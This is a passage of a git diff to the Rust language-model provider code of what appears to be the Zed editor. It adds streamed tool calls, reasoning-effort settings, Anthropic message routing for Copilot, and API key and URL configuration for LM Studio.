ZedAiConfiguration { is_connected, plan, - subscription_period: plan - .is_some() - .then(|| (Utc::now(), Utc::now() + chrono::Duration::days(7))), eligible_for_trial, account_too_young, sign_in_callback: Arc::new(|_, _| {}), diff --git a/crates/language_models/src/provider/copilot_chat.rs b/crates/language_models/src/provider/copilot_chat.rs index 4363430f865de63ed5fec0d6b40b085d9413fc2a..a2d39e1945e2791d9d5c998cc717a07498ebc157 100644 --- a/crates/language_models/src/provider/copilot_chat.rs +++ b/crates/language_models/src/provider/copilot_chat.rs @@ -2,15 +2,16 @@ use std::pin::Pin; use std::str::FromStr as _; use std::sync::Arc; +use anthropic::AnthropicModelMode; use anyhow::{Result, anyhow}; -use 
cloud_llm_client::CompletionIntent; use collections::HashMap; use copilot::{GlobalCopilotAuth, Status}; use copilot_chat::responses as copilot_responses; use copilot_chat::{ - ChatMessage, ChatMessageContent, ChatMessagePart, CopilotChat, CopilotChatConfiguration, - Function, FunctionContent, ImageUrl, Model as CopilotChatModel, ModelVendor, - Request as CopilotChatRequest, ResponseEvent, Tool, ToolCall, ToolCallContent, ToolChoice, + ChatLocation, ChatMessage, ChatMessageContent, ChatMessagePart, CopilotChat, + CopilotChatConfiguration, Function, FunctionContent, ImageUrl, Model as CopilotChatModel, + ModelVendor, Request as CopilotChatRequest, ResponseEvent, Tool, ToolCall, ToolCallContent, + ToolChoice, }; use futures::future::BoxFuture; use futures::stream::BoxStream; @@ -19,9 +20,9 @@ use gpui::{AnyView, App, AsyncApp, Entity, Subscription, Task}; use http_client::StatusCode; use language::language_settings::all_language_settings; use language_model::{ - AuthenticateError, IconOrSvg, LanguageModel, LanguageModelCompletionError, - LanguageModelCompletionEvent, LanguageModelCostInfo, LanguageModelId, LanguageModelName, - LanguageModelProvider, LanguageModelProviderId, LanguageModelProviderName, + AuthenticateError, CompletionIntent, IconOrSvg, LanguageModel, LanguageModelCompletionError, + LanguageModelCompletionEvent, LanguageModelCostInfo, LanguageModelEffortLevel, LanguageModelId, + LanguageModelName, LanguageModelProvider, LanguageModelProviderId, LanguageModelProviderName, LanguageModelProviderState, LanguageModelRequest, LanguageModelRequestMessage, LanguageModelToolChoice, LanguageModelToolResultContent, LanguageModelToolSchemaFormat, LanguageModelToolUse, MessageContent, RateLimiter, Role, StopReason, TokenUsage, @@ -30,7 +31,8 @@ use settings::SettingsStore; use ui::prelude::*; use util::debug_panic; -use crate::provider::util::parse_tool_arguments; +use crate::provider::anthropic::{AnthropicEventMapper, into_anthropic}; +use 
crate::provider::util::{fix_streamed_json, parse_tool_arguments}; const PROVIDER_ID: LanguageModelProviderId = LanguageModelProviderId::new("copilot_chat"); const PROVIDER_NAME: LanguageModelProviderName = @@ -246,10 +248,41 @@ impl LanguageModel for CopilotChatLanguageModel { self.model.supports_tools() } + fn supports_streaming_tools(&self) -> bool { + true + } + fn supports_images(&self) -> bool { self.model.supports_vision() } + fn supports_thinking(&self) -> bool { + self.model.can_think() + } + + fn supported_effort_levels(&self) -> Vec { + let levels = self.model.reasoning_effort_levels(); + if levels.is_empty() { + return vec![]; + } + levels + .iter() + .map(|level| { + let name: SharedString = match level.as_str() { + "low" => "Low".into(), + "medium" => "Medium".into(), + "high" => "High".into(), + _ => SharedString::from(level.clone()), + }; + LanguageModelEffortLevel { + name, + value: SharedString::from(level.clone()), + is_default: level == "high", + } + }) + .collect() + } + fn tool_input_format(&self) -> LanguageModelToolSchemaFormat { match self.model.vendor() { ModelVendor::OpenAI | ModelVendor::Anthropic => { @@ -323,18 +356,101 @@ impl LanguageModel for CopilotChatLanguageModel { | CompletionIntent::TerminalInlineAssist | CompletionIntent::GenerateGitCommitMessage => true, - CompletionIntent::ToolResults + CompletionIntent::Subagent + | CompletionIntent::ToolResults | CompletionIntent::ThreadSummarization | CompletionIntent::CreateFile | CompletionIntent::EditFile => false, }); + if self.model.supports_messages() { + let location = intent_to_chat_location(request.intent); + let model = self.model.clone(); + let request_limiter = self.request_limiter.clone(); + let future = cx.spawn(async move |cx| { + let effort = request + .thinking_effort + .as_ref() + .and_then(|e| anthropic::Effort::from_str(e).ok()); + + let mut anthropic_request = into_anthropic( + request, + model.id().to_string(), + 0.0, + model.max_output_tokens() as u64, + if 
model.supports_adaptive_thinking() { + AnthropicModelMode::Thinking { + budget_tokens: None, + } + } else if model.can_think() { + AnthropicModelMode::Thinking { + budget_tokens: compute_thinking_budget( + model.min_thinking_budget(), + model.max_thinking_budget(), + model.max_output_tokens() as u32, + ), + } + } else { + AnthropicModelMode::Default + }, + ); + + anthropic_request.temperature = None; + + // The Copilot proxy doesn't support eager_input_streaming on tools. + for tool in &mut anthropic_request.tools { + tool.eager_input_streaming = false; + } + + if model.supports_adaptive_thinking() { + if anthropic_request.thinking.is_some() { + anthropic_request.thinking = Some(anthropic::Thinking::Adaptive); + anthropic_request.output_config = Some(anthropic::OutputConfig { effort }); + } + } + + let anthropic_beta = if !model.supports_adaptive_thinking() && model.can_think() { + Some("interleaved-thinking-2025-05-14".to_string()) + } else { + None + }; + + let body = serde_json::to_string(&anthropic::StreamingRequest { + base: anthropic_request, + stream: true, + }) + .map_err(|e| anyhow::anyhow!(e))?; + + let stream = CopilotChat::stream_messages( + body, + location, + is_user_initiated, + anthropic_beta, + cx.clone(), + ); + + request_limiter + .stream(async move { + let events = stream.await?; + let mapper = AnthropicEventMapper::new(); + Ok(mapper.map_stream(events).boxed()) + }) + .await + }); + return async move { Ok(future.await?.boxed()) }.boxed(); + } + if self.model.supports_response() { + let location = intent_to_chat_location(request.intent); let responses_request = into_copilot_responses(&self.model, request); let request_limiter = self.request_limiter.clone(); let future = cx.spawn(async move |cx| { - let request = - CopilotChat::stream_response(responses_request, is_user_initiated, cx.clone()); + let request = CopilotChat::stream_response( + responses_request, + location, + is_user_initiated, + cx.clone(), + ); request_limiter .stream(async move { 
let stream = request.await?; @@ -346,6 +462,7 @@ impl LanguageModel for CopilotChatLanguageModel { return async move { Ok(future.await?.boxed()) }.boxed(); } + let location = intent_to_chat_location(request.intent); let copilot_request = match into_copilot_chat(&self.model, request) { Ok(request) => request, Err(err) => return futures::future::ready(Err(err.into())).boxed(), @@ -354,8 +471,12 @@ impl LanguageModel for CopilotChatLanguageModel { let request_limiter = self.request_limiter.clone(); let future = cx.spawn(async move |cx| { - let request = - CopilotChat::stream_completion(copilot_request, is_user_initiated, cx.clone()); + let request = CopilotChat::stream_completion( + copilot_request, + location, + is_user_initiated, + cx.clone(), + ); request_limiter .stream(async move { let response = request.await?; @@ -455,6 +576,23 @@ pub fn map_to_language_model_completion_events( entry.thought_signature = Some(thought_signature); } } + + if !entry.id.is_empty() && !entry.name.is_empty() { + if let Ok(input) = serde_json::from_str::( + &fix_streamed_json(&entry.arguments), + ) { + events.push(Ok(LanguageModelCompletionEvent::ToolUse( + LanguageModelToolUse { + id: entry.id.clone().into(), + name: entry.name.as_str().into(), + is_input_complete: false, + input, + raw_input: entry.arguments.clone(), + thought_signature: entry.thought_signature.clone(), + }, + ))); + } + } } if let Some(usage) = event.usage { @@ -727,7 +865,7 @@ impl CopilotResponsesEventMapper { } copilot_responses::StreamEvent::GenericError { error } => vec![Err( - LanguageModelCompletionError::Other(anyhow!(format!("{error:?}"))), + LanguageModelCompletionError::Other(anyhow!(error.message)), )], copilot_responses::StreamEvent::Created { .. 
} @@ -740,6 +878,9 @@ fn into_copilot_chat( model: &CopilotChatModel, request: LanguageModelRequest, ) -> Result { + let temperature = request.temperature; + let tool_choice = request.tool_choice; + let mut request_messages: Vec = Vec::new(); for message in request.messages { if let Some(last_message) = request_messages.last_mut() { @@ -838,10 +979,9 @@ fn into_copilot_chat( let text_content = { let mut buffer = String::new(); for string in message.content.iter().filter_map(|content| match content { - MessageContent::Text(text) | MessageContent::Thinking { text, .. } => { - Some(text.as_str()) - } - MessageContent::ToolUse(_) + MessageContent::Text(text) => Some(text.as_str()), + MessageContent::Thinking { .. } + | MessageContent::ToolUse(_) | MessageContent::RedactedThinking(_) | MessageContent::ToolResult(_) | MessageContent::Image(_) => None, @@ -898,21 +1038,53 @@ fn into_copilot_chat( .collect::>(); Ok(CopilotChatRequest { - intent: true, n: 1, stream: model.uses_streaming(), - temperature: 0.1, + temperature: temperature.unwrap_or(0.1), model: model.id().to_string(), messages, tools, - tool_choice: request.tool_choice.map(|choice| match choice { + tool_choice: tool_choice.map(|choice| match choice { LanguageModelToolChoice::Auto => ToolChoice::Auto, - LanguageModelToolChoice::Any => ToolChoice::Any, + LanguageModelToolChoice::Any => ToolChoice::Required, LanguageModelToolChoice::None => ToolChoice::None, }), + thinking_budget: None, }) } +fn compute_thinking_budget( + min_budget: Option, + max_budget: Option, + max_output_tokens: u32, +) -> Option { + let configured_budget: u32 = 16000; + let min_budget = min_budget.unwrap_or(1024); + let max_budget = max_budget.unwrap_or(max_output_tokens.saturating_sub(1)); + let normalized = configured_budget.max(min_budget); + Some( + normalized + .min(max_budget) + .min(max_output_tokens.saturating_sub(1)), + ) +} + +fn intent_to_chat_location(intent: Option) -> ChatLocation { + match intent { + 
Some(CompletionIntent::UserPrompt) => ChatLocation::Agent, + Some(CompletionIntent::Subagent) => ChatLocation::Agent, + Some(CompletionIntent::ToolResults) => ChatLocation::Agent, + Some(CompletionIntent::ThreadSummarization) => ChatLocation::Panel, + Some(CompletionIntent::ThreadContextSummarization) => ChatLocation::Panel, + Some(CompletionIntent::CreateFile) => ChatLocation::Agent, + Some(CompletionIntent::EditFile) => ChatLocation::Agent, + Some(CompletionIntent::InlineAssist) => ChatLocation::Editor, + Some(CompletionIntent::TerminalInlineAssist) => ChatLocation::Terminal, + Some(CompletionIntent::GenerateGitCommitMessage) => ChatLocation::Other, + None => ChatLocation::Panel, + } +} + fn into_copilot_responses( model: &CopilotChatModel, request: LanguageModelRequest, @@ -928,7 +1100,7 @@ fn into_copilot_responses( tool_choice, stop: _, temperature, - thinking_allowed: _, + thinking_allowed, thinking_effort: _, speed: _, } = request; @@ -940,38 +1112,26 @@ fn into_copilot_responses( Role::User => { for content in &message.content { if let MessageContent::ToolResult(tool_result) = content { - let output = if let Some(out) = &tool_result.output { - match out { - serde_json::Value::String(s) => { - responses::ResponseFunctionOutput::Text(s.clone()) - } - serde_json::Value::Null => { - responses::ResponseFunctionOutput::Text(String::new()) - } - other => responses::ResponseFunctionOutput::Text(other.to_string()), + let output = match &tool_result.content { + LanguageModelToolResultContent::Text(text) => { + responses::ResponseFunctionOutput::Text(text.to_string()) } - } else { - match &tool_result.content { - LanguageModelToolResultContent::Text(text) => { - responses::ResponseFunctionOutput::Text(text.to_string()) - } - LanguageModelToolResultContent::Image(image) => { - if model.supports_vision() { - responses::ResponseFunctionOutput::Content(vec![ - responses::ResponseInputContent::InputImage { - image_url: Some(image.to_base64_url()), - detail: 
Default::default(), - }, - ]) - } else { - debug_panic!( - "This should be caught at {} level", - tool_result.tool_name - ); - responses::ResponseFunctionOutput::Text( + LanguageModelToolResultContent::Image(image) => { + if model.supports_vision() { + responses::ResponseFunctionOutput::Content(vec![ + responses::ResponseInputContent::InputImage { + image_url: Some(image.to_base64_url()), + detail: Default::default(), + }, + ]) + } else { + debug_panic!( + "This should be caught at {} level", + tool_result.tool_name + ); + responses::ResponseFunctionOutput::Text( "[Tool responded with an image, but this model does not support vision]".into(), ) - } } } }; @@ -1096,7 +1256,7 @@ fn into_copilot_responses( let mapped_tool_choice = tool_choice.map(|choice| match choice { LanguageModelToolChoice::Auto => responses::ToolChoice::Auto, - LanguageModelToolChoice::Any => responses::ToolChoice::Any, + LanguageModelToolChoice::Any => responses::ToolChoice::Required, LanguageModelToolChoice::None => responses::ToolChoice::None, }); @@ -1107,10 +1267,18 @@ fn into_copilot_responses( temperature, tools: converted_tools, tool_choice: mapped_tool_choice, - reasoning: None, // We would need to add support for setting from user settings. 
+ reasoning: if thinking_allowed { + Some(copilot_responses::ReasoningConfig { + effort: copilot_responses::ReasoningEffort::Medium, + summary: Some(copilot_responses::ReasoningSummary::Detailed), + }) + } else { + None + }, include: Some(vec![ copilot_responses::ResponseIncludable::ReasoningEncryptedContent, ]), + store: false, } } diff --git a/crates/language_models/src/provider/deepseek.rs b/crates/language_models/src/provider/deepseek.rs index 2a9f7322b1fb5d3d1e6713c5a084b83dc2b01ce2..0cfb1af425c7cb0279d98fa124a589437f1bb1a1 100644 --- a/crates/language_models/src/provider/deepseek.rs +++ b/crates/language_models/src/provider/deepseek.rs @@ -1,5 +1,6 @@ use anyhow::{Result, anyhow}; use collections::{BTreeMap, HashMap}; +use credentials_provider::CredentialsProvider; use deepseek::DEEPSEEK_API_URL; use futures::Stream; @@ -22,7 +23,7 @@ use ui::{ButtonLink, ConfiguredApiCard, List, ListBulletItem, prelude::*}; use ui_input::InputField; use util::ResultExt; -use crate::provider::util::parse_tool_arguments; +use crate::provider::util::{fix_streamed_json, parse_tool_arguments}; const PROVIDER_ID: LanguageModelProviderId = LanguageModelProviderId::new("deepseek"); const PROVIDER_NAME: LanguageModelProviderName = LanguageModelProviderName::new("DeepSeek"); @@ -49,6 +50,7 @@ pub struct DeepSeekLanguageModelProvider { pub struct State { api_key_state: ApiKeyState, + credentials_provider: Arc, } impl State { @@ -57,30 +59,51 @@ impl State { } fn set_api_key(&mut self, api_key: Option, cx: &mut Context) -> Task> { + let credentials_provider = self.credentials_provider.clone(); let api_url = DeepSeekLanguageModelProvider::api_url(cx); - self.api_key_state - .store(api_url, api_key, |this| &mut this.api_key_state, cx) + self.api_key_state.store( + api_url, + api_key, + |this| &mut this.api_key_state, + credentials_provider, + cx, + ) } fn authenticate(&mut self, cx: &mut Context) -> Task> { + let credentials_provider = self.credentials_provider.clone(); let api_url = 
DeepSeekLanguageModelProvider::api_url(cx); - self.api_key_state - .load_if_needed(api_url, |this| &mut this.api_key_state, cx) + self.api_key_state.load_if_needed( + api_url, + |this| &mut this.api_key_state, + credentials_provider, + cx, + ) } } impl DeepSeekLanguageModelProvider { - pub fn new(http_client: Arc, cx: &mut App) -> Self { + pub fn new( + http_client: Arc, + credentials_provider: Arc, + cx: &mut App, + ) -> Self { let state = cx.new(|cx| { cx.observe_global::(|this: &mut State, cx| { + let credentials_provider = this.credentials_provider.clone(); let api_url = Self::api_url(cx); - this.api_key_state - .handle_url_change(api_url, |this| &mut this.api_key_state, cx); + this.api_key_state.handle_url_change( + api_url, + |this| &mut this.api_key_state, + credentials_provider, + cx, + ); cx.notify(); }) .detach(); State { api_key_state: ApiKeyState::new(Self::api_url(cx), (*API_KEY_ENV_VAR).clone()), + credentials_provider, } }); @@ -246,6 +269,10 @@ impl LanguageModel for DeepSeekLanguageModel { true } + fn supports_streaming_tools(&self) -> bool { + true + } + fn supports_tool_choice(&self, _choice: LanguageModelToolChoice) -> bool { true } @@ -327,15 +354,25 @@ pub fn into_deepseek( for message in request.messages { for content in message.content { match content { - MessageContent::Text(text) => messages.push(match message.role { - Role::User => deepseek::RequestMessage::User { content: text }, - Role::Assistant => deepseek::RequestMessage::Assistant { - content: Some(text), - tool_calls: Vec::new(), - reasoning_content: current_reasoning.take(), - }, - Role::System => deepseek::RequestMessage::System { content: text }, - }), + MessageContent::Text(text) => { + let should_add = if message.role == Role::User { + !text.trim().is_empty() + } else { + !text.is_empty() + }; + + if should_add { + messages.push(match message.role { + Role::User => deepseek::RequestMessage::User { content: text }, + Role::Assistant => deepseek::RequestMessage::Assistant { + 
content: Some(text), + tool_calls: Vec::new(), + reasoning_content: current_reasoning.take(), + }, + Role::System => deepseek::RequestMessage::System { content: text }, + }); + } + } MessageContent::Thinking { text, .. } => { // Accumulate reasoning content for next assistant message current_reasoning.get_or_insert_default().push_str(&text); @@ -441,7 +478,9 @@ impl DeepSeekEventMapper { }; let mut events = Vec::new(); - if let Some(content) = choice.delta.content.clone() { + if let Some(content) = choice.delta.content.clone() + && !content.is_empty() + { events.push(Ok(LanguageModelCompletionEvent::Text(content))); } @@ -469,6 +508,23 @@ impl DeepSeekEventMapper { entry.arguments.push_str(&arguments); } } + + if !entry.id.is_empty() && !entry.name.is_empty() { + if let Ok(input) = serde_json::from_str::( + &fix_streamed_json(&entry.arguments), + ) { + events.push(Ok(LanguageModelCompletionEvent::ToolUse( + LanguageModelToolUse { + id: entry.id.clone().into(), + name: entry.name.as_str().into(), + is_input_complete: false, + input, + raw_input: entry.arguments.clone(), + thought_signature: None, + }, + ))); + } + } } } diff --git a/crates/language_models/src/provider/google.rs b/crates/language_models/src/provider/google.rs index 334a5cbe64e6cdefbaa7c15c309ca4632109e323..244f7835a85ff67f0c4826321910ea13516371cb 100644 --- a/crates/language_models/src/provider/google.rs +++ b/crates/language_models/src/provider/google.rs @@ -1,5 +1,6 @@ use anyhow::{Context as _, Result}; use collections::BTreeMap; +use credentials_provider::CredentialsProvider; use futures::{FutureExt, Stream, StreamExt, future::BoxFuture}; use google_ai::{ FunctionDeclaration, GenerateContentResponse, GoogleModelMode, Part, SystemInstruction, @@ -13,9 +14,9 @@ use language_model::{ LanguageModelToolUse, LanguageModelToolUseId, MessageContent, StopReason, }; use language_model::{ - IconOrSvg, LanguageModel, LanguageModelId, LanguageModelName, LanguageModelProvider, - LanguageModelProviderId, 
LanguageModelProviderName, LanguageModelProviderState, - LanguageModelRequest, RateLimiter, Role, + GOOGLE_PROVIDER_ID, GOOGLE_PROVIDER_NAME, IconOrSvg, LanguageModel, LanguageModelId, + LanguageModelName, LanguageModelProvider, LanguageModelProviderId, LanguageModelProviderName, + LanguageModelProviderState, LanguageModelRequest, RateLimiter, Role, }; use schemars::JsonSchema; use serde::{Deserialize, Serialize}; @@ -33,8 +34,8 @@ use util::ResultExt; use language_model::ApiKeyState; -const PROVIDER_ID: LanguageModelProviderId = language_model::GOOGLE_PROVIDER_ID; -const PROVIDER_NAME: LanguageModelProviderName = language_model::GOOGLE_PROVIDER_NAME; +const PROVIDER_ID: LanguageModelProviderId = GOOGLE_PROVIDER_ID; +const PROVIDER_NAME: LanguageModelProviderName = GOOGLE_PROVIDER_NAME; #[derive(Default, Clone, Debug, PartialEq)] pub struct GoogleSettings { @@ -60,6 +61,7 @@ pub struct GoogleLanguageModelProvider { pub struct State { api_key_state: ApiKeyState, + credentials_provider: Arc, } const GEMINI_API_KEY_VAR_NAME: &str = "GEMINI_API_KEY"; @@ -76,30 +78,51 @@ impl State { } fn set_api_key(&mut self, api_key: Option, cx: &mut Context) -> Task> { + let credentials_provider = self.credentials_provider.clone(); let api_url = GoogleLanguageModelProvider::api_url(cx); - self.api_key_state - .store(api_url, api_key, |this| &mut this.api_key_state, cx) + self.api_key_state.store( + api_url, + api_key, + |this| &mut this.api_key_state, + credentials_provider, + cx, + ) } fn authenticate(&mut self, cx: &mut Context) -> Task> { + let credentials_provider = self.credentials_provider.clone(); let api_url = GoogleLanguageModelProvider::api_url(cx); - self.api_key_state - .load_if_needed(api_url, |this| &mut this.api_key_state, cx) + self.api_key_state.load_if_needed( + api_url, + |this| &mut this.api_key_state, + credentials_provider, + cx, + ) } } impl GoogleLanguageModelProvider { - pub fn new(http_client: Arc, cx: &mut App) -> Self { + pub fn new( + http_client: Arc, + 
credentials_provider: Arc, + cx: &mut App, + ) -> Self { let state = cx.new(|cx| { cx.observe_global::(|this: &mut State, cx| { + let credentials_provider = this.credentials_provider.clone(); let api_url = Self::api_url(cx); - this.api_key_state - .handle_url_change(api_url, |this| &mut this.api_key_state, cx); + this.api_key_state.handle_url_change( + api_url, + |this| &mut this.api_key_state, + credentials_provider, + cx, + ); cx.notify(); }) .detach(); State { api_key_state: ApiKeyState::new(Self::api_url(cx), (*API_KEY_ENV_VAR).clone()), + credentials_provider, } }); diff --git a/crates/language_models/src/provider/lmstudio.rs b/crates/language_models/src/provider/lmstudio.rs index 9af8559c722d1fe726f7f871c9863cd85a3d2678..0d60fef16791087e35bac7d846b2ec99821d5470 100644 --- a/crates/language_models/src/provider/lmstudio.rs +++ b/crates/language_models/src/provider/lmstudio.rs @@ -1,26 +1,31 @@ use anyhow::{Result, anyhow}; use collections::HashMap; +use credentials_provider::CredentialsProvider; +use fs::Fs; use futures::Stream; use futures::{FutureExt, StreamExt, future::BoxFuture, stream::BoxStream}; -use gpui::{AnyView, App, AsyncApp, Context, Entity, Subscription, Task}; +use gpui::{AnyView, App, AsyncApp, Context, CursorStyle, Entity, Subscription, Task}; use http_client::HttpClient; use language_model::{ - AuthenticateError, LanguageModelCompletionError, LanguageModelCompletionEvent, - LanguageModelToolChoice, LanguageModelToolResultContent, LanguageModelToolUse, MessageContent, - StopReason, TokenUsage, + ApiKeyState, AuthenticateError, EnvVar, IconOrSvg, LanguageModel, LanguageModelCompletionError, + LanguageModelCompletionEvent, LanguageModelToolChoice, LanguageModelToolResultContent, + LanguageModelToolUse, MessageContent, StopReason, TokenUsage, env_var, }; use language_model::{ - IconOrSvg, LanguageModel, LanguageModelId, LanguageModelName, LanguageModelProvider, - LanguageModelProviderId, LanguageModelProviderName, LanguageModelProviderState, - 
LanguageModelRequest, RateLimiter, Role, + LanguageModelId, LanguageModelName, LanguageModelProvider, LanguageModelProviderId, + LanguageModelProviderName, LanguageModelProviderState, LanguageModelRequest, RateLimiter, Role, }; -use lmstudio::{ModelType, get_models}; +use lmstudio::{LMSTUDIO_API_URL, ModelType, get_models}; + pub use settings::LmStudioAvailableModel as AvailableModel; -use settings::{Settings, SettingsStore}; +use settings::{Settings, SettingsStore, update_settings_file}; use std::pin::Pin; +use std::sync::LazyLock; use std::{collections::BTreeMap, sync::Arc}; -use ui::{ButtonLike, Indicator, List, ListBulletItem, prelude::*}; -use util::ResultExt; +use ui::{ + ButtonLike, ConfiguredApiCard, ElevationIndex, List, ListBulletItem, Tooltip, prelude::*, +}; +use ui_input::InputField; use crate::AllLanguageModelSettings; use crate::provider::util::parse_tool_arguments; @@ -32,6 +37,9 @@ const LMSTUDIO_SITE: &str = "https://lmstudio.ai/"; const PROVIDER_ID: LanguageModelProviderId = LanguageModelProviderId::new("lmstudio"); const PROVIDER_NAME: LanguageModelProviderName = LanguageModelProviderName::new("LM Studio"); +const API_KEY_ENV_VAR_NAME: &str = "LMSTUDIO_API_KEY"; +static API_KEY_ENV_VAR: LazyLock = env_var!(API_KEY_ENV_VAR_NAME); + #[derive(Default, Debug, Clone, PartialEq)] pub struct LmStudioSettings { pub api_url: String, @@ -44,6 +52,8 @@ pub struct LmStudioLanguageModelProvider { } pub struct State { + api_key_state: ApiKeyState, + credentials_provider: Arc, http_client: Arc, available_models: Vec, fetch_model_task: Option>>, @@ -55,14 +65,30 @@ impl State { !self.available_models.is_empty() } + fn set_api_key(&mut self, api_key: Option, cx: &mut Context) -> Task> { + let credentials_provider = self.credentials_provider.clone(); + let api_url = LmStudioLanguageModelProvider::api_url(cx).into(); + let task = self.api_key_state.store( + api_url, + api_key, + |this| &mut this.api_key_state, + credentials_provider, + cx, + ); + 
self.restart_fetch_models_task(cx); + task + } + fn fetch_models(&mut self, cx: &mut Context) -> Task> { let settings = &AllLanguageModelSettings::get_global(cx).lmstudio; let http_client = self.http_client.clone(); let api_url = settings.api_url.clone(); + let api_key = self.api_key_state.key(&api_url); // As a proxy for the server being "authenticated", we'll check if its up by fetching the models cx.spawn(async move |this, cx| { - let models = get_models(http_client.as_ref(), &api_url, None).await?; + let models = + get_models(http_client.as_ref(), &api_url, api_key.as_deref(), None).await?; let mut models: Vec = models .into_iter() @@ -95,6 +121,15 @@ impl State { } fn authenticate(&mut self, cx: &mut Context) -> Task> { + let credentials_provider = self.credentials_provider.clone(); + let api_url = LmStudioLanguageModelProvider::api_url(cx).into(); + let _task = self.api_key_state.load_if_needed( + api_url, + |this| &mut this.api_key_state, + credentials_provider, + cx, + ); + if self.is_authenticated() { return Task::ready(Ok(())); } @@ -128,16 +163,29 @@ impl State { } impl LmStudioLanguageModelProvider { - pub fn new(http_client: Arc, cx: &mut App) -> Self { + pub fn new( + http_client: Arc, + credentials_provider: Arc, + cx: &mut App, + ) -> Self { let this = Self { http_client: http_client.clone(), state: cx.new(|cx| { let subscription = cx.observe_global::({ let mut settings = AllLanguageModelSettings::get_global(cx).lmstudio.clone(); move |this: &mut State, cx| { - let new_settings = &AllLanguageModelSettings::get_global(cx).lmstudio; - if &settings != new_settings { - settings = new_settings.clone(); + let new_settings = + AllLanguageModelSettings::get_global(cx).lmstudio.clone(); + if settings != new_settings { + let credentials_provider = this.credentials_provider.clone(); + let api_url = Self::api_url(cx).into(); + this.api_key_state.handle_url_change( + api_url, + |this| &mut this.api_key_state, + credentials_provider, + cx, + ); + settings = 
new_settings; this.restart_fetch_models_task(cx); cx.notify(); } @@ -145,6 +193,11 @@ impl LmStudioLanguageModelProvider { }); State { + api_key_state: ApiKeyState::new( + Self::api_url(cx).into(), + (*API_KEY_ENV_VAR).clone(), + ), + credentials_provider, http_client, available_models: Default::default(), fetch_model_task: None, @@ -156,6 +209,17 @@ impl LmStudioLanguageModelProvider { .update(cx, |state, cx| state.restart_fetch_models_task(cx)); this } + + fn api_url(cx: &App) -> String { + AllLanguageModelSettings::get_global(cx) + .lmstudio + .api_url + .clone() + } + + fn has_custom_url(cx: &App) -> bool { + Self::api_url(cx) != LMSTUDIO_API_URL + } } impl LanguageModelProviderState for LmStudioLanguageModelProvider { @@ -225,6 +289,7 @@ impl LanguageModelProvider for LmStudioLanguageModelProvider { model, http_client: self.http_client.clone(), request_limiter: RateLimiter::new(4), + state: self.state.clone(), }) as Arc }) .collect() @@ -244,12 +309,13 @@ impl LanguageModelProvider for LmStudioLanguageModelProvider { _window: &mut Window, cx: &mut App, ) -> AnyView { - let state = self.state.clone(); - cx.new(|cx| ConfigurationView::new(state, cx)).into() + cx.new(|cx| ConfigurationView::new(self.state.clone(), _window, cx)) + .into() } fn reset_credentials(&self, cx: &mut App) -> Task> { - self.state.update(cx, |state, cx| state.fetch_models(cx)) + self.state + .update(cx, |state, cx| state.set_api_key(None, cx)) } } @@ -258,6 +324,7 @@ pub struct LmStudioLanguageModel { model: lmstudio::Model, http_client: Arc, request_limiter: RateLimiter, + state: Entity, } impl LmStudioLanguageModel { @@ -376,15 +443,20 @@ impl LmStudioLanguageModel { Result>>, > { let http_client = self.http_client.clone(); - let api_url = cx.update(|cx| { - let settings = &AllLanguageModelSettings::get_global(cx).lmstudio; - settings.api_url.clone() + let (api_key, api_url) = self.state.read_with(cx, |state, cx| { + let api_url = LmStudioLanguageModelProvider::api_url(cx); + 
(state.api_key_state.key(&api_url), api_url) }); let future = self.request_limiter.stream(async move { - let request = lmstudio::stream_chat_completion(http_client.as_ref(), &api_url, request); - let response = request.await?; - Ok(response) + let stream = lmstudio::stream_chat_completion( + http_client.as_ref(), + &api_url, + api_key.as_deref(), + request, + ) + .await?; + Ok(stream) }); async move { Ok(future.await?.boxed()) }.boxed() @@ -634,37 +706,196 @@ fn add_message_content_part( struct ConfigurationView { state: Entity, - loading_models_task: Option>, + api_key_editor: Entity, + api_url_editor: Entity, } impl ConfigurationView { - pub fn new(state: Entity, cx: &mut Context) -> Self { - let loading_models_task = Some(cx.spawn({ - let state = state.clone(); - async move |this, cx| { - state - .update(cx, |state, cx| state.authenticate(cx)) - .await - .log_err(); - - this.update(cx, |this, cx| { - this.loading_models_task = None; - cx.notify(); - }) - .log_err(); - } - })); + pub fn new(state: Entity, _window: &mut Window, cx: &mut Context) -> Self { + let api_key_editor = cx.new(|cx| InputField::new(_window, cx, "sk-...").label("API key")); + + let api_url_editor = cx.new(|cx| { + let input = InputField::new(_window, cx, LMSTUDIO_API_URL).label("API URL"); + input.set_text(&LmStudioLanguageModelProvider::api_url(cx), _window, cx); + input + }); + + cx.observe(&state, |_, _, cx| { + cx.notify(); + }) + .detach(); Self { state, - loading_models_task, + api_key_editor, + api_url_editor, + } + } + + fn retry_connection(&mut self, _window: &mut Window, cx: &mut Context) { + let has_api_url = LmStudioLanguageModelProvider::has_custom_url(cx); + let has_api_key = self + .state + .read_with(cx, |state, _| state.api_key_state.has_key()); + if !has_api_url { + self.save_api_url(cx); + } + if !has_api_key { + self.save_api_key(&Default::default(), _window, cx); } + + self.state.update(cx, |state, cx| { + state.restart_fetch_models_task(cx); + }); } - fn 
retry_connection(&self, cx: &mut App) { + fn save_api_key(&mut self, _: &menu::Confirm, _window: &mut Window, cx: &mut Context) { + let api_key = self.api_key_editor.read(cx).text(cx).trim().to_string(); + if api_key.is_empty() { + return; + } + + self.api_key_editor + .update(cx, |input, cx| input.set_text("", _window, cx)); + + let state = self.state.clone(); + cx.spawn_in(_window, async move |_, cx| { + state + .update(cx, |state, cx| state.set_api_key(Some(api_key), cx)) + .await + }) + .detach_and_log_err(cx); + } + + fn reset_api_key(&mut self, _window: &mut Window, cx: &mut Context) { + self.api_key_editor + .update(cx, |input, cx| input.set_text("", _window, cx)); + + let state = self.state.clone(); + cx.spawn_in(_window, async move |_, cx| { + state + .update(cx, |state, cx| state.set_api_key(None, cx)) + .await + }) + .detach_and_log_err(cx); + + cx.notify(); + } + + fn save_api_url(&self, cx: &mut Context) { + let api_url = self.api_url_editor.read(cx).text(cx).trim().to_string(); + let current_url = LmStudioLanguageModelProvider::api_url(cx); + if !api_url.is_empty() && &api_url != ¤t_url { + self.state + .update(cx, |state, cx| state.set_api_key(None, cx)) + .detach_and_log_err(cx); + + let fs = ::global(cx); + update_settings_file(fs, cx, move |settings, _| { + settings + .language_models + .get_or_insert_default() + .lmstudio + .get_or_insert_default() + .api_url = Some(api_url); + }); + } + } + + fn reset_api_url(&mut self, _window: &mut Window, cx: &mut Context) { + self.api_url_editor + .update(cx, |input, cx| input.set_text("", _window, cx)); + + // Clear API key when URL changes since keys are URL-specific self.state - .update(cx, |state, cx| state.fetch_models(cx)) + .update(cx, |state, cx| state.set_api_key(None, cx)) .detach_and_log_err(cx); 